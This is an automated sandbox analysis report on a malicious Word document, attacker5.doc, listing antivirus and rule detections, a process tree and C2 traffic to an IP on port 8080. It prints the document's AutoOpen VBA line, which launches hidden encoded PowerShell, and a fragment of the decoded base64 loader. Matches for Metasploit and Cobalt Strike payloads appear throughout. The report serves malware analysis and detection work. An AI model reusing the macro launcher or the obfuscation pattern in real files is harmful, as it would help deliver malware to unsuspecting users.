
Windows Analysis Report attacker5.doc

Overview

General Information

Sample Name: attacker5.doc
Analysis ID: 522199
MD5: 4ac3d0835c1650e2ec73c8607d55ed1d
SHA1: ad6ebde97a0f082cfc812f5f99ecb83b0c4caf4b
SHA256: 55c9ff8f829bf0d5bbec83127570ad149bd18bc0351c59933090af917b4451db

Detection

Metasploit
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected MetasploitPayload
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Malicious encrypted Powershell command line found
Antivirus detection for dropped file
Document contains an embedded VBA macro which may execute processes
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Microsoft Office Product Spawning Windows Shell
Encrypted powershell cmdline option found
Very long command line found
Suspicious powershell command line found
Machine Learning detection for sample
Sigma detected: Suspicious PowerShell Cmdline
Document contains an embedded VBA macro with suspicious strings
Sigma detected: Malicious Base64 Encoded PowerShell Keywords in Command Lines
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Document has an unknown application name
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Document contains no OLE stream with summary information
Potential document exploit detected (unknown TCP traffic)
Detected TCP or UDP traffic on non-standard ports
Document contains embedded VBA macros
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2080 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • powershell.exe (PID: 1292 cmdline: powershell -nop -w hidden -encodedcommand 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 MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • powershell.exe (PID: 2912 cmdline: "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -s -NoLogo -NoProfile MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source: attacker5.doc; Rule: Office_AutoOpen_Macro; Description: Detects an Microsoft Office file that contains the AutoOpen Macro function; Author: Florian Roth; Strings:
  • 0x719e:$s1: AutoOpen
  • 0x5280:$s2: Macros

Dropped Files

Source: C:\Users\user\AppData\Local\Temp\~DF8739F9799F11C9B7.TMP; Rule: SUSP_VBA_FileSystem_Access; Description: Detects suspicious VBA that writes to disk and is activated on document open; Author: Florian Roth; Strings:
  • 0x5488:$s1: \Common Files\Microsoft Shared\
  • 0x2a46:$s2: Scripting.FileSystemObject
  • 0x644c:$s2: Scripting.FileSystemObject
  • 0x2da3:$a3: AutoOpen
  • 0x70a6:$a3: AutoOpen
  • 0x729f:$a3: AutoOpen
  • 0x8f45:$a3: AutoOpen

Memory Dumps

Source: 00000002.00000002.418638987.0000000002DA7000.00000004.00000001.sdmp; Rule: SUSP_PS1_FromBase64String_Content_Indicator; Description: Detects suspicious base64 encoded PowerShell expressions; Author: Florian Roth; Strings:
  • 0x63a8:$: ::FromBase64String("H4s
  • 0x63a8:$: ::FromBase64String("H4sIA
Source: 00000002.00000002.421617900.0000000003A93000.00000004.00000001.sdmp; Rule: Msfpayloads_msf_ref; Description: Metasploit Payloads - file msf-ref.ps1; Author: Florian Roth; Strings:
  • 0x6ba0:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')
  • 0x7148:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual',
  • 0x7236:$s5: = [System.Convert]::FromBase64String(
  • 0x6e5c:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]]
  • 0x7086:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard,
Source: 00000002.00000002.421617900.0000000003A93000.00000004.00000001.sdmp; Rule: Cobaltbaltstrike_Payload_Encoded; Description: Detects CobaltStrike payloads; Author: Avast Threat Intel Team; Strings:
  • 0x725c:$s11: 38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0
Source: 00000002.00000002.421617900.0000000003A93000.00000004.00000001.sdmp; Rule: JoeSecurity_MetasploitPayload_1; Description: Yara detected MetasploitPayload; Author: Joe Security
Source: 00000002.00000002.417824735.0000000000350000.00000004.00000020.sdmp; Rule: WiltedTulip_WindowsTask; Description: Detects hack tool used in Operation Wilted Tulip - Windows Tasks; Author: Florian Roth; Strings:
  • 0x698a:$x3: -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgA

Sigma Overview

System Summary:

Sigma detected: Suspicious Encoded PowerShell Command Line
Source: Process started; Author: Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community; Data: Command: powershell -nop -w hidden -encodedcommand [base64-encoded command omitted]
Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started; Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team; Data: Command: powershell -nop -w hidden -encodedcommand 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
Sigma detected: Suspicious PowerShell Cmdline
Source: Process started; Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community; Data: Command: powershell -nop -w hidden -encodedcommand [base64-encoded command omitted]
Sigma detected: Malicious Base64 Encoded PowerShell Keywords in Command Lines
Source: Process started; Author: John Lambert (rule); Data: Command: powershell -nop -w hidden -encodedcommand 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
Sigma detected: Non Interactive PowerShell
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell -nop -w hidden -encodedcommand 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

Jbx Signature Overview


AV Detection:

Multi AV Scanner detection for submitted file
Source: attacker5.doc; Virustotal: Detection: 49%
Source: attacker5.doc; Metadefender: Detection: 40%
Source: attacker5.doc; ReversingLabs: Detection: 45%
Antivirus / Scanner detection for submitted sample
Source: attacker5.doc; Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\~DF8739F9799F11C9B7.TMP; Avira: detection malicious, Label: HEUR/Macro.Downloader.YPA.Gen
Machine Learning detection for sample
Source: attacker5.doc; Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: global traffic; TCP traffic: 192.168.2.22:49165 -> 176.103.56.89:8080
Source: unknown; TCP traffic detected without corresponding DNS query: 176.103.56.89
Source: powershell.exe, 00000002.00000002.418116880.0000000002360000.00000002.00020000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000002.00000002.418116880.0000000002360000.00000002.00020000.sdmp; String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000002.00000002.417841377.0000000000393000.00000004.00000020.sdmp; String found in binary or memory: http://www.piriform.com/ccleaner
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{48A7C03B-9CB7-46B2-8DC4-5DC849FD423A}.tmp

E-Banking Fraud:

Malicious encrypted Powershell command line found
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -w hidden -encodedcommand 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

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000002.00000002.421617900.0000000003A93000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
Source: 00000002.00000002.417824735.0000000000350000.00000004.00000020.sdmp, type: MEMORY; Matched rule: Detects hack tool used in Operation Wilted Tulip - Windows Tasks Author: Florian Roth
Source: 00000002.00000002.421677056.0000000003ADF000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
Source: 00000002.00000002.420764427.0000000003737000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
Source: 00000002.00000002.421630363.0000000003AA1000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
Source: Process Memory Space: powershell.exe PID: 1292, type: MEMORYSTR; Matched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
Source: Process Memory Space: powershell.exe PID: 1292, type: MEMORYSTR; Matched rule: Detects hack tool used in Operation Wilted Tulip - Windows Tasks Author: Florian Roth
Document contains an embedded VBA macro which may execute processes
Source: attacker5.doc; OLE, VBA macro line: Shell "powershell -nop -w hidden -encodedcommand " & CatchMeIfYouCan.SquidGame.ControlTipText
Source: ~DF8739F9799F11C9B7.TMP.0.dr; OLE, VBA macro line: JbxHook_Shell_1_ = Shell(jbxparam0)
Very long command line found
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; Process created: Commandline size = 7490
Document contains an embedded VBA macro with suspicious strings
Source: attacker5.doc; OLE, VBA macro line: Shell "powershell -nop -w hidden -encodedcommand " & CatchMeIfYouCan.SquidGame.ControlTipText
Source: VBA code instrumentation; OLE, VBA macro: Module Module1, Function AutoOpen, String powershell: Shell "powershell -nop -w hidden -encodedcommand " & CatchMeIfYouCan.SquidGame.ControlTipText; Name: AutoOpen
Source: ~DF8739F9799F11C9B7.TMP.0.dr; OLE, VBA macro line: JbxHook_Shell_1_ 3, "powershell -nop -w hidden -encodedcommand " & CatchMeIfYouCan.SquidGame.ControlTipText
Source: attacker5.doc, type: SAMPLE; Matched rule: Office_AutoOpen_Macro date = 2015-05-28, hash5 = 7c06cab49b9332962625b16f15708345, hash4 = a3035716fe9173703941876c2bde9d98, hash3 = 66e67c2d84af85a569a04042141164e6, hash2 = 63f6b20cb39630b13c14823874bd3743, author = Florian Roth, description = Detects an Microsoft Office file that contains the AutoOpen Macro function, hash7 = 25285b8fe2c41bd54079c92c1b761381, hash6 = bfc30332b7b91572bfe712b656ea8a0c, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 4d00695d5011427efc33c9722c61ced2
Source: 00000002.00000002.418638987.0000000002DA7000.00000004.00000001.sdmp, type: MEMORY; Matched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
Source: 00000002.00000002.421617900.0000000003A93000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000002.00000002.421617900.0000000003A93000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000002.00000002.417824735.0000000000350000.00000004.00000020.sdmp, type: MEMORY; Matched rule: WiltedTulip_WindowsTask date = 2017-07-23, hash5 = 984c7e1f76c21daf214b3f7e131ceb60c14abf1b0f4066eae563e9c184372a34, hash4 = 5046e7c28f5f2781ed7a63b0871f4a2b3065b70d62de7254491339e8fe2fa14a, hash3 = b6f515b3f713b70b808fc6578232901ffdeadeb419c9c4219fbfba417bba9f01, hash2 = 340cbbffbb7685133fc318fa20e4620ddf15e56c0e65d4cf1b2d606790d4425d, hash1 = c3cbe88b82cd0ea46868fb4f2e8ed226f3419fc6d4d6b5f7561e70f4cd33822c, author = Florian Roth, description = Detects hack tool used in Operation Wilted Tulip - Windows Tasks, reference = http://www.clearskysec.com/tulip, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000002.00000002.421677056.0000000003ADF000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000002.00000002.421677056.0000000003ADF000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000002.00000002.420764427.0000000003737000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000002.00000002.420764427.0000000003737000.00000004.00000001.sdmp, type: MEMORY; Matched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
Source: 00000002.00000002.420764427.0000000003737000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000002.00000002.421630363.0000000003AA1000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000002.00000002.421630363.0000000003AA1000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000002.00000002.420980701.000000000389D000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: Process Memory Space: powershell.exe PID: 1292, type: MEMORYSTR; Matched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: powershell.exe PID: 1292, type: MEMORYSTR; Matched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
Source: Process Memory Space: powershell.exe PID: 1292, type: MEMORYSTR; Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: Process Memory Space: powershell.exe PID: 1292, type: MEMORYSTR; Matched rule: WiltedTulip_WindowsTask date = 2017-07-23, hash5 = 984c7e1f76c21daf214b3f7e131ceb60c14abf1b0f4066eae563e9c184372a34, hash4 = 5046e7c28f5f2781ed7a63b0871f4a2b3065b70d62de7254491339e8fe2fa14a, hash3 = b6f515b3f713b70b808fc6578232901ffdeadeb419c9c4219fbfba417bba9f01, hash2 = 340cbbffbb7685133fc318fa20e4620ddf15e56c0e65d4cf1b2d606790d4425d, hash1 = c3cbe88b82cd0ea46868fb4f2e8ed226f3419fc6d4d6b5f7561e70f4cd33822c, author = Florian Roth, description = Detects hack tool used in Operation Wilted Tulip - Windows Tasks, reference = http://www.clearskysec.com/tulip, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\AppData\Local\Temp\~DF8739F9799F11C9B7.TMP, type: DROPPED; Matched rule: SUSP_VBA_FileSystem_Access date = 2019-06-21, author = Florian Roth, description = Detects suspicious VBA that writes to disk and is activated on document open, reference = Internal Research, score = 52262bb315fa55b7441a04966e176b0e26b7071376797e35c80aa60696b6d6fc
Source: ~DF93C02D3A080000CF.TMP.0.dr; OLE indicator application name: unknown
Source: ~WRF{6B5ACF7C-A8AD-4685-9DCC-FB49D0970A68}.tmp.0.dr; OLE indicator application name: unknown
Source: ~DF8739F9799F11C9B7.TMP.0.dr; OLE indicator application name: unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 2_2_000007FF0029428D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 2_2_000007FF00292CA9
Source: attacker5.doc; OLE, VBA macro line: Sub AutoOpen()
Source: VBA code instrumentation; OLE, VBA macro: Module Module1, Function AutoOpen; Name: AutoOpen
Source: ~DF8739F9799F11C9B7.TMP.0.dr; OLE, VBA macro line: Sub AutoOpen()
Source: ~DF93C02D3A080000CF.TMP.0.dr; OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~WRF{6B5ACF7C-A8AD-4685-9DCC-FB49D0970A68}.tmp.0.dr; OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DF8739F9799F11C9B7.TMP.0.dr; OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DF93C02D3A080000CF.TMP.0.dr; OLE indicator has summary info: false
Source: ~WRF{6B5ACF7C-A8AD-4685-9DCC-FB49D0970A68}.tmp.0.dr; OLE indicator has summary info: false
Source: ~DF8739F9799F11C9B7.TMP.0.dr; OLE indicator has summary info: false
Source: attacker5.doc; OLE indicator, VBA macros: true
Source: ~DF8739F9799F11C9B7.TMP.0.dr; OLE indicator, VBA macros: true
Source: attacker5.doc; Virustotal: Detection: 49%
Source: attacker5.doc; Metadefender: Detection: 40%
Source: attacker5.doc; ReversingLabs: Detection: 45%
    Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -w hidden -encodedcommand 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
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    Source: attacker5.doc | OLE indicator, Word Document stream: true
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$tacker5.doc
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRCBA7.tmp
    Source: classification engine | Classification label: mal100.bank.troj.expl.evad.winDOC@5/15@0/1
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
    Source: attacker5.doc | OLE document summary: title field not present or empty
    Source: ~DF93C02D3A080000CF.TMP.0.dr | OLE document summary: title field not present or empty
    Source: ~DF93C02D3A080000CF.TMP.0.dr | OLE document summary: author field not present or empty
    Source: ~DF93C02D3A080000CF.TMP.0.dr | OLE document summary: edited time not present or 0
    Source: ~WRF{6B5ACF7C-A8AD-4685-9DCC-FB49D0970A68}.tmp.0.dr | OLE document summary: title field not present or empty
    Source: ~WRF{6B5ACF7C-A8AD-4685-9DCC-FB49D0970A68}.tmp.0.dr | OLE document summary: author field not present or empty
    Source: ~WRF{6B5ACF7C-A8AD-4685-9DCC-FB49D0970A68}.tmp.0.dr | OLE document summary: edited time not present or 0
    Source: ~DF8739F9799F11C9B7.TMP.0.dr | OLE document summary: title field not present or empty
    Source: ~DF8739F9799F11C9B7.TMP.0.dr | OLE document summary: author field not present or empty
    Source: ~DF8739F9799F11C9B7.TMP.0.dr | OLE document summary: edited time not present or 0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Window found: window name: SysTabControl32
    Source: Window Recorder | Window detected: More than 3 window changes detected
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: ~DF93C02D3A080000CF.TMP.0.dr | Initial sample: OLE indicators vbamacros = False

    Data Obfuscation:

    Suspicious powershell command line found
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -w hidden -encodedcommand [base64-encoded command omitted]
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_000007FF0025090D push edi; ret 2_2_000007FF00250996
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1528 | Thread sleep time: -1844674407370954s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2860 | Thread sleep time: -1844674407370954s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2860 | Thread sleep time: -60000s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2860 | Thread sleep time: -60000s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2668 | Thread sleep time: -120000s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 60000
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 60000
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
    Source: powershell.exe, 00000002.00000002.417841377.0000000000393000.00000004.00000020.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

Encrypted powershell cmdline option found
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: Base64 decoded $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("[gzip-compressed base64 payload blob omitted]"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -w hidden -encodedcommand [encoded command omitted]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -s -NoLogo -NoProfile
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\pspluginwkr.dll VolumeInformation
